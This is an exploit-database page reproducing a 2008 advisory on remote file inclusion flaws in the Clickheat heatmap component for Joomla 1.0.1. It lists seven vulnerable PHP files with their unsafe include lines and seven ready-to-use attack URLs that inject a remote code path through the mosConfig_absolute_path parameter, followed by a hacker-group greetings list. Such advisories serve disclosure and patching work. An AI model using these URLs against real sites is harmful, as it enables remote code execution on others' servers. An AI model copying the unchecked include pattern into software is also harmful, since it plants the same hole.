header-logo
Suggest Exploit
vendor:
Clickheat
by:
NoGe
9
CVSS
HIGH
Multiple Remote File Inclusion
98
CWE
Product Name: Clickheat
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:recly:clickheat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla!
2008

Clickheat – Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities

Multiple Remote File Inclusion vulnerabilities exist in com_clickheat version 1.0.1. The vulnerable files are install.clickheat.php, _main.php, main.php, overview/main.php, Cache.php, Clickheat_Heatmap.php, and GlobalVariables.php. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request containing a URL with a malicious file path in the mosConfig_absolute_path parameter. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of com_clickheat.
Source

Exploit-DB raw data:

=========================================================================================================================================================


  [o] Clickheat - Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities

       Software : com_clickheat version 1.0.1
       Vendor   : http://www.recly.com/
       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=========================================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_clickheat/install.clickheat.php

        require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');

       administrator/components/com_clickheat/includes/heatmap/_main.php

        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );

       administrator/components/com_clickheat/includes/heatmap/main.php

        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );

       administrator/components/com_clickheat/includes/overview/main.php

        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );

       administrator/components/com_clickheat/Recly/Clickheat/Cache.php

        require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');

       administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php

        require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');

       administrator/components/com_clickheat/Recly/common/GlobalVariables.php

        require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');



  [o] Exploit

       http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]
       http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]
       http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]
       http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]


=========================================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11  martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

        
=========================================================================================================================================================

# milw0rm.com [2008-11-07]